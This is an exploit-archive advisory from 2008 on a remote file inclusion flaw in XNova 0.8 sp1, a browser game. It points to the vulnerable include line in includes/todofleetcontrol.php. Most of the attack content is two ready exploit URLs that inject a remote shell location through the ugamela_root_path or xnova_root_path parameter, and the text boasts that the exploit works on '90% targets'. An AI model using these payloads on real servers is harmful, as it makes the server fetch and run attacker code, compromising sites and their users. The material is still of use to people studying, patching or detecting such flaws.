id: 3532
date: 08/16/2008
title: XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability
author: NuclearHaxor
cves: 

===================================================================
XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability
===================================================================



##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor

homepage of xnova: http://xnova.fr/

Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)

Exploit(this exploit works in 90% targets):

------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------



#  0day.today [2023-03-23]  #